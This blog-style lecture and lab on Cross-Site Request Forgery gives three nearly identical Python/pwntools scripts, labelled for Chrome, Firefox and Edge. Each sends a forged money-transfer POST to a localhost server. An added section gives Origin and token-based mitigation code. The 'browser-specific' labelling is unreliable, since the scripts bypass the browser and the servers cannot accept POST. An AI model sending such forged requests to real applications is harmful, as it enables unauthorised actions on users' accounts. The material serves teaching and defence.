strangerRidingCaml

Real-world browser exploit

3. Cross-Site Request Forgery (CSRF)

woddlwoddl 2024. 5. 14. 18:58

Lecture: Exploring CSRF attacks and browser-specific considerations.

In this lecture, we will delve into the world of Cross-Site Request Forgery (CSRF) attacks, exploring their underlying mechanisms and potential impact on web application security. CSRF attacks occur when an attacker tricks a user into performing unintended actions on a web application where the user is authenticated.

We will discuss various techniques used by attackers to exploit CSRF vulnerabilities, including the use of maliciously crafted HTML pages, social engineering tactics, and the exploitation of browser weaknesses. Additionally, we will explore browser-specific considerations that may affect the effectiveness of CSRF attacks, such as browser security mechanisms and default behavior.

By the end of this lecture, students will have a deep understanding of CSRF attacks and the factors that influence their success across different web browsers.

Lab: Creating and mitigating CSRF attacks in Chrome, Firefox, and Edge.

Chrome Exploitation:

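Defender-side code: To set up the defender side, we need a simple web server. Here's an example using Python's built-in HTTP server:


import http.server
import socketserver

PORT = 8000

# SimpleHTTPRequestHandler serves files from the current directory for GET and
# HEAD only; it defines no do_POST, so a POST to /transfer is answered with 501.
Handler = http.server.SimpleHTTPRequestHandler

# "" binds every interface; use "127.0.0.1" to keep the lab server local.
with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("Serving at port", PORT)
    httpd.serve_forever()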

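Exploit code: Exploiting CSRF in Chrome can be done using Python with libraries like pwntools. Below is example exploit code for launching a CSRF attack. Note that the script sends the forged POST straight to the lab server rather than through the browser, so it reproduces the request itself but not the browser's automatic attachment of the victim's session cookie:


from pwn import remote

url = 'http://localhost:8000/transfer'
payload = 'victim_account=attacker_account&amount=1000'

r = remote('localhost', 8000)
# HTTP lines end in CRLF; a blank line separates the headers from the body
request = (f'POST {url} HTTP/1.1\r\n'
           'Host: localhost:8000\r\n'
           'Content-Type: application/x-www-form-urlencoded\r\n'
           f'Content-Length: {len(payload)}\r\n'
           'Connection: close\r\n\r\n'
           f'{payload}')
r.send(request.encode())
print(r.recvall().decode())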

Firefox Exploitation:

Defender-side code: As in the Chrome setup, we can use Python's built-in HTTP server.


import http.server
import socketserver

PORT = 8001

# Static file handler: GET and HEAD only, so POST requests are answered with 501.
Handler = http.server.SimpleHTTPRequestHandler

with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("Serving at port", PORT)
    httpd.serve_forever()

Exploit code: Exploiting CSRF in Firefox can be done similarly to Chrome. Here's an example:


from pwn import remote

url = 'http://localhost:8001/transfer'
payload = 'victim_account=attacker_account&amount=1000'

r = remote('localhost', 8001)
# HTTP lines end in CRLF; a blank line separates the headers from the body
request = (f'POST {url} HTTP/1.1\r\n'
           'Host: localhost:8001\r\n'
           'Content-Type: application/x-www-form-urlencoded\r\n'
           f'Content-Length: {len(payload)}\r\n'
           'Connection: close\r\n\r\n'
           f'{payload}')
r.send(request.encode())
print(r.recvall().decode())

Edge Exploitation:

Defender-side code: Again, using Python's HTTP server.


import http.server
import socketserver

PORT = 8002

# Static file handler: GET and HEAD only, so POST requests are answered with 501.
Handler = http.server.SimpleHTTPRequestHandler

with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("Serving at port", PORT)
    httpd.serve_forever()

Exploit code: Exploiting CSRF in Edge follows the same principle. Here's an example exploit:


from pwn import remote

url = 'http://localhost:8002/transfer'
payload = 'victim_account=attacker_account&amount=1000'

r = remote('localhost', 8002)
# HTTP lines end in CRLF; a blank line separates the headers from the body
request = (f'POST {url} HTTP/1.1\r\n'
           'Host: localhost:8002\r\n'
           'Content-Type: application/x-www-form-urlencoded\r\n'
           f'Content-Length: {len(payload)}\r\n'
           'Connection: close\r\n\r\n'
           f'{payload}')
r.send(request.encode())
print(r.recvall().decode())
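
Mitigation: the lab servers above only serve static files, and the page gives no code for the mitigation half of the lab. As an added example (not from the original post), here is one way a /transfer endpoint could reject the forged POST, using an Origin allowlist plus a session-bound HMAC token. The cookie name `session`, the form field `csrf_token`, the allowed origin and the helper names are assumptions made for illustration.

```python
import hashlib
import hmac
import http.server
import secrets
from http.cookies import SimpleCookie
from urllib.parse import parse_qs

SECRET = secrets.token_bytes(32)             # per-process key (assumption: one server)
ALLOWED_ORIGINS = {"http://localhost:8000"}  # assumption: the lab's own origin


def issue_token(session_id: str) -> str:
    """CSRF token bound to one session: HMAC-SHA256(SECRET, session_id)."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_transfer(origin, cookie_header, body: str) -> int:
    """Return the HTTP status a POST /transfer should receive."""
    # 1. Browsers attach Origin to cross-site POSTs; reject foreign or missing ones.
    if origin not in ALLOWED_ORIGINS:
        return 403
    # 2. The session cookie is sent automatically, so it proves nothing by itself.
    morsel = SimpleCookie(cookie_header or "").get("session")
    if morsel is None:
        return 401
    # 3. The token travels in the form body, which another site cannot read or guess.
    sent = parse_qs(body).get("csrf_token", [""])[0]
    expected = issue_token(morsel.value)
    if not hmac.compare_digest(sent.encode(), expected.encode()):
        return 403
    return 200


class TransferHandler(http.server.BaseHTTPRequestHandler):
    def do_POST(self):
        if self.path != "/transfer":
            self.send_error(404)
            return
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode()
        status = check_transfer(self.headers.get("Origin"),
                                self.headers.get("Cookie"), body)
        self.send_response(status)
        self.end_headers()


if __name__ == "__main__":
    http.server.HTTPServer(("localhost", 8000), TransferHandler).serve_forever()
```

Issuing the session cookie with `SameSite=Lax` or `SameSite=Strict` adds a browser-side layer on top of these server-side checks.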